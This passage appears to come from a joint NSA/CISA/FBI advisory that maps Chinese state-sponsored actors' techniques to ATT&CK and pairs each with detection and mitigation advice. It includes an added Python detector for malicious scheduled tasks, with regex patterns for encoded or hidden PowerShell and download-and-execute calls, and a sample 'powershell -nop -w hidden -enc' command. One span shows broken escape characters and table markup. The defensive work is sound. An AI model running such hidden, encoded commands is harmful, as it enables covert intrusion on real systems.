 * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity.
SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.
 * **Use protection capabilities to stop malicious activity.** Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.

### Resources

Refer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and <https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/> for previous reporting on Chinese state-sponsored malicious cyber activity.

### Disclaimer of Endorsement

The information and opinions contained in this document are provided "as is" and without any warranties or guarantees.
Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

### Purpose

This document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see <http://www.us-cert.gov/tlp/>.

### Trademark Recognition

 * MITRE and ATT&CK are registered trademarks of The MITRE Corporation.
 * D3FEND is a trademark of The MITRE Corporation.
 * Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation.
 * Pulse Secure is a registered trademark of Pulse Secure, LLC.
 * Apache is a registered trademark of Apache Software Foundation.
 * F5 and BIG-IP are registered trademarks of F5 Networks.
 * Cobalt Strike is a registered trademark of Strategic Cyber LLC.
 * GitHub is a registered trademark of GitHub, Inc.
 * JavaScript is a registered trademark of Oracle Corporation.
 * Python is a registered trademark of Python Software Foundation.
 * Unix is a registered trademark of The Open Group.
 * Linux is a registered trademark of Linus Torvalds.
 * Dropbox is a registered trademark of Dropbox, Inc.

### APPENDIX A: Chinese State-Sponsored Cyber Actors' Observed Procedures

**Note:** D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.

### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)]

_Table 1: Chinese state-sponsored cyber actors' Reconnaissance TTPs with detection and mitigation recommendations_

**Threat Actor Technique / Sub-Techniques:** Active Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)]; Gather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft® 365 (M365), formerly Office® 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python® scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization's fully qualified domain name, IP address space, and open ports to target or exploit.

**Detection and Mitigation Recommendations:** Minimize the amount and sensitivity of data available to external parties, for example:

 * Scrub user email addresses and contact lists from public websites, which can be used for social engineering,
 * Share only necessary data and information with third parties, and
 * Monitor and limit third-party access to the network.

Active scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.

**Defensive Tactics and Techniques:**

 * Detect:
   * Network Traffic Analysis
     * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]
 * Isolate:
   * Network Isolation
     * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]

_Table II: Chinese state-sponsored cyber actors' Resource Development TTPs with detection and mitigation recommendations_

**Threat Actor Technique / Sub-Techniques:** Acquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]; Stage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.

**Detection and Mitigation Recommendations:** Adversary activities occurring outside the organization's boundary of control and view make mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.

**Defensive Tactics and Techniques:** N/A

**Threat Actor Technique / Sub-Techniques:** Obtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]: Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed using Cobalt Strike® and tools from GitHub® on victim networks.

**Detection and Mitigation Recommendations:** Organizations may be able to identify malicious use of Cobalt Strike by:

 * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human-generated versus machine-generated traffic; the latter will be more uniformly distributed.
 * Looking for the default Cobalt Strike TLS certificate.
 * Looking at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.
 * Reviewing the traffic destination domain, which may be malicious and an indicator of compromise.
 * Looking at the packet's HTTP host header. If it does not match the destination domain, it may indicate a fake Cobalt Strike header and profile.
 * Checking the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language.

If discovered, additional recovery and investigation will be required.

**Defensive Tactics and Techniques:** N/A

### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]

_Table III: Chinese state-sponsored cyber actors' Initial Access TTPs with detection and mitigation recommendations_

**Threat Actor Technique / Sub-Techniques:** Drive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.

**Detection and Mitigation Recommendations:**

 * Ensure all browsers and plugins are kept up to date.
 * Use modern browsers with security features turned on.
 * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript®, restrict browser extensions, etc.
 * Use adblockers to help prevent malicious code served through advertisements from executing.
 * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes.
 * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.
 * Use security applications that look for behavior used during exploitation, such as Windows Defender® Exploit Guard (WDEG).

**Defensive Tactics and Techniques:**

 * Detect:
   * Identifier Analysis
     * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
     * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
   * File Analysis
     * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
 * Isolate:
   * Execution Isolation
     * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
     * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
   * Network Isolation
     * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
     * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]

**Threat Actor Technique / Sub-Techniques:** Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources.
Chinese state-sponsored cyber actors have also been observed:

 * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange® Outlook Web Access (OWA®) and plant webshells.
 * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.
 * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.

**Detection and Mitigation Recommendations:** Review previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.

Additional mitigations include:

 * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.
 * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).
 * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.
 * Disable protocols using weak authentication.
 * Limit access to and between cloud resources with the desired state being a Zero Trust model.
For more information refer to NSA Cybersecurity Information Sheet: [Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>).
 * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).
 * Use automated tools to audit access logs for security concerns.
 * Where possible, enforce MFA for password resets.
 * Do not include Application Programming Interface (API) keys in software version control systems where they can be unintentionally leaked.

**Defensive Tactics and Techniques:**

 * Harden:
   * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]
   * Platform Hardening
     * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]
 * Detect:
   * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)]
   * Network Traffic Analysis
     * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
   * Process Analysis
     * Process Spawn Analysis
     * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]
 * Isolate:
   * Network Isolation
     * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

**Threat Actor Technique / Sub-Techniques:** Phishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]: Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)]; Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures.
These compromise attempts use the cyber actors' dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim's device after the user clicks on the malicious link or opens the attachment.

**Detection and Mitigation Recommendations:**

 * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and reinforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.
 * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.
 * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`, `.vbs`).
 * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]).
Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.
 * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
 * Prevent users from clicking on malicious links by stripping hyperlinks or implementing "URL defanging" at the Email Security Gateway or other email security tools.
 * Add external sender banners to emails to alert users that the email came from an external sender.

**Defensive Tactics and Techniques:**

 * Harden:
   * Message Hardening
     * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]
     * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]
 * Detect:
   * File Analysis
     * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
   * Identifier Analysis
     * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
     * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
   * Message Analysis
     * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]
     * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)]

**Threat Actor Technique / Sub-Techniques:** External Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed:

 * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities.
The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.
 * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).
 * Exploiting Internet-accessible web servers using small webshell code injections across multiple languages, including `net`, `asp`, `aspx`, `php`, `jspx`, and `cfm`.

**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.

**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].

**Detection and Mitigation Recommendations:**

 * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.
 * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.
 * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).
 * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.
 * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.
 * Review and verify all connections between customer systems, service provider systems, and other client enclaves.

**Defensive Tactics and Techniques:**

 * Harden:
   * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]
 * Detect:
   * Network Traffic Analysis
     * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]
   * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]
   * Process Analysis
     * Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
     * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]

**Threat Actor Technique / Sub-Techniques:** Valid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]: Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]; Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed gaining credential access into victim networks by using legitimate, but compromised, credentials to access OWA servers, corporate login portals, and victim networks.

**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].

**Detection and Mitigation Recommendations:**

 * Adhere to best practices for password and permission management.
 * Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only the systems they manage.
 * Do not store credentials or sensitive data in plaintext.
 * Change all default usernames and passwords.
 * Routinely update and secure applications using Secure Shell (SSH).
\n * Update SSH keys regularly and keep private keys secure.\n * Routinely audit privileged accounts to identify malicious use.\n| \n\nHarden: \n\n * Credential Hardening \n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\nDetect:\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)] \n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]\n\n_Table IV: Chinese state-sponsored cyber actors\u2019 Execution TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nCommand and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]: \n\n * PowerShell\u00ae [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]\n\n * Windows\u00ae Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]\n\n * Unix\u00ae Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]\n\n * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]\n\n * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]\n\n * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).\n\n * Using PowerShell to conduct reconnaissance, enumeration, and 
discovery of the victim network. \n\n * Employing Python scripts to exploit vulnerable servers.\n\n * Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\n| \n\nPowerShell\n\n * Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)\n\n * Push Powershell logs into a security information and event management (SIEM) tool.\n\n * Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.\n\n * Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.\n\n * Remove PowerShell if it is not necessary for operations. \n\n * Restrict which commands can be used.\n\nWindows Command Shell\n\n * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. \n\n * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled. \n\n * Monitor for and investigate other unusual or suspicious scripting behavior. \n\nUnix\n\n * Use application controls to prevent execution.\n\n * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. \n\n * If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. 
\n\nPython\n\n * Audit inventory systems for unauthorized Python installations.\n\n * Blocklist Python where not required.\n\n * Prevent users from installing Python where not required.\n\nJavaScript\n\n * Turn off or restrict access to unneeded scripting components.\n\n * Blocklist scripting where appropriate.\n\n * For malicious code served up through ads, adblockers can help prevent that code from executing.\n\nNetwork Device Command Line Interface (CLI)\n\n * Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.\n\n * Use an authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.\n\n * Ensure least privilege principles are applied to user accounts and groups.\n\n| \n\nHarden: \n\n * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nScheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]\n\n * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]\n * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtask` or `crontab` to create and schedule tasks that enumerate victim devices and networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation 
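
The scheduled task recommendations above come down to baselining who creates tasks, when, and what the task runs. The following Python script is an added example, not code from the advisory, showing one way to apply those checks to Windows Security event 4698 ("a scheduled task was created") records exported as JSON lines: it parses the task definition XML for the command and arguments and flags tasks created by accounts outside an assumed approved set, created by an approved account outside an assumed maintenance window, run from user-writable paths, or run through a script interpreter with hiding or encoding switches. The approved accounts, the maintenance window, and the sample events are constructed placeholders to replace with your own baseline.

```python
import json
import re
import xml.etree.ElementTree as ET
from datetime import datetime

# Assumed environment baseline (placeholders): accounts that legitimately create
# tasks, and the maintenance window in which they normally do so (01:00-04:59).
APPROVED_CREATORS = {"svc-patchmgmt", "svc-sccm"}
MAINTENANCE_HOURS = range(1, 5)

USER_WRITABLE = re.compile(r"(%temp%|\\appdata\\|\\users\\public\\|%public%|\\programdata\\)", re.I)
INTERPRETERS = re.compile(r"(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?$", re.I)
SUSPICIOUS_ARGS = re.compile(r"(-enc\w*|-nop\w*|-w(indowstyle)?\s+hidden|/c\s|downloadstring|\biex\b|frombase64)", re.I)


def local_name(tag):
    """Task Scheduler XML carries a namespace on every element; keep only the local name."""
    return tag.rsplit("}", 1)[-1]


def parse_task_actions(task_xml):
    """Return [(command, arguments), ...] from the <Exec> actions of a task definition."""
    actions = []
    for el in ET.fromstring(task_xml).iter():
        if local_name(el.tag) != "Exec":
            continue
        cmd = args = ""
        for child in el:
            if local_name(child.tag) == "Command":
                cmd = (child.text or "").strip()
            elif local_name(child.tag) == "Arguments":
                args = (child.text or "").strip()
        actions.append((cmd, args))
    return actions


def analyze_task_event(event):
    """Reasons a 4698 record looks anomalous; an empty list means nothing stood out."""
    reasons = []
    creator = event["SubjectUserName"].lower()
    created = datetime.fromisoformat(event["TimeCreated"])
    if creator not in APPROVED_CREATORS:
        reasons.append(f"task created by {creator!r}, not an approved task-creating account")
    elif created.hour not in MAINTENANCE_HOURS:
        reasons.append(f"approved account created a task outside the maintenance window ({created:%H:%M})")
    for cmd, args in parse_task_actions(event["TaskContent"]):
        invocation = f"{cmd} {args}".strip()
        if USER_WRITABLE.search(invocation):
            reasons.append(f"task runs from a user-writable path: {invocation}")
        if INTERPRETERS.search(cmd) and SUSPICIOUS_ARGS.search(args):
            reasons.append(f"script interpreter with hiding/encoding switches: {invocation}")
    return reasons


def scan_task_events(lines):
    """Apply analyze_task_event to JSON-lines input; return {TaskName: reasons} for flagged tasks."""
    flagged = {}
    for line in lines:
        event = json.loads(line)
        if event.get("EventID") != 4698:
            continue
        reasons = analyze_task_event(event)
        if reasons:
            flagged[event["TaskName"]] = reasons
    return flagged


def task_xml(command, arguments):
    """Minimal task definition in the Task Scheduler schema; used only to build the constructed samples."""
    return ('<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><Actions><Exec>'
            f"<Command>{command}</Command><Arguments>{arguments}</Arguments></Exec></Actions></Task>")


# Constructed 4698 records: a normal patch-window task, a user-created hidden encoded
# PowerShell task, and an approved account creating a task from a public folder at night.
SAMPLE_TASK_EVENTS = [json.dumps(e) for e in (
    {"EventID": 4698, "TimeCreated": "2021-07-19T02:15:00", "SubjectUserName": "svc-patchmgmt",
     "TaskName": "\\Microsoft\\Windows\\Patching\\Monthly",
     "TaskContent": task_xml(r"C:\Program Files\PatchAgent\agent.exe", "--apply")},
    {"EventID": 4698, "TimeCreated": "2021-07-19T13:42:11", "SubjectUserName": "jdoe",
     "TaskName": "\\Updater",
     "TaskContent": task_xml("powershell.exe", "-nop -w hidden -enc AAAA")},
    {"EventID": 4698, "TimeCreated": "2021-07-19T23:01:00", "SubjectUserName": "svc-sccm",
     "TaskName": "\\OneDrive Sync",
     "TaskContent": task_xml(r"C:\Users\Public\sync.exe", "")},
)]

if __name__ == "__main__":
    for name, why in scan_task_events(SAMPLE_TASK_EVENTS).items():
        print(name, "->", "; ".join(why))
```

On a real host the same records come from the Security log (the task XML is the `TaskContent` field of event 4698); on Linux the equivalent is watching writes to `/etc/cron*` and user crontabs, which this script does not cover.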

Technique: User Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]

 * Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]
 * Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provides the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.

Detection and Mitigation Recommendations:

 * Use an antivirus program, which may stop malicious code that cyber actors convince users to execute.
 * Prevent unauthorized execution by disabling macro scripts in Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
 * Use a domain reputation service to detect and block suspicious or malicious domains.
 * Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
 * Ensure all browsers and plugins are kept up to date.
 * Use modern browsers with security features turned on.
 * Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.

Defensive Tactics and Techniques:

Detect:

 * File Analysis
   * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
   * File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]
 * Identifier Analysis
   * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
   * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
 * Network Traffic Analysis
   * DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]

Isolate:

 * Execution Isolation
   * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
   * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
 * Network Isolation
   * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
   * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]

### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]

_Table V: Chinese state-sponsored cyber actors’ Persistence TTPs with detection and mitigation recommendations_

Technique: Hijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]

 * DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed using benign executables that relied on Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process.

**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].

Detection and Mitigation Recommendations:

 * Disallow loading of remote DLLs.
 * Enable safe DLL search mode.
 * Implement tools for detecting search order hijacking opportunities.
 * Use application allowlisting to block unknown DLLs.
 * Monitor the file system for created, moved, and renamed DLLs.
 * Monitor for changes in system DLLs not associated with updates or patches.
 * Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).

Defensive Tactics and Techniques:

Detect:

 * Platform Monitoring
   * Operating System Monitoring
     * Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]
 * Process Analysis
   * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]

Isolate:

 * Execution Isolation
   * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

Technique: Modify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]

 * Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements in order to maintain access to the victim network.

**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].

Detection and Mitigation Recommendations:

 * Monitor for policy changes to authentication mechanisms used by the domain controller.
 * Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).
 * Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.
